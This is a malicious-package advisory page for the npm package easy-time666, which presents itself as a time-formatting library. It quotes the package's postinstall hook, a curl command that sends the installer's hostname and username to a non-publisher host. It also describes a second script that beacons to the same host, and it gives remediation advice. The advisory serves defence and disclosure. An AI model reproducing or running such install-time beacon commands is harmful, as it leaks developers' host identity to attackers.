MAL-2026-5749

    Dashboard / Malicious Package / MAL-2026-5749

    MAL-2026-5749

    Published: 13 Jun 2026Last Modified: 25 Jun 2026Aliases: 
    GHSA-wfff-g64j-qx73

    Summary: Malicious code in easy-time666 (npm)

    Details: Source: amazon-inspector (57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22) package.json declares a postinstall hook that runs `curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami)` over plain HTTP on every `npm install`, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON `{ping:'npm'}` to the same host (`npm.wdf1.eyes.sh`) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads. Source: ghsa-malware (ce8b04c425e8212c5a2a197092fe1890a5bc3d3ce8bd8dabb145c8b5c9c8cf8e) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. Source: ossf-package-analysis (6d4d0f8dc97023a33bc4928ce119e7001f5233f8b7fda31afffeb9dbb3ba9cdf) The OpenSSF Package Analysis project identified 'easy-time666' @ 1.0.0 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.

    Affected packages

    Package

    Name: easy-time666

    Purl: pkg:npm/easy-time666

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.0
    MAL-2026-5749 | CVE-DB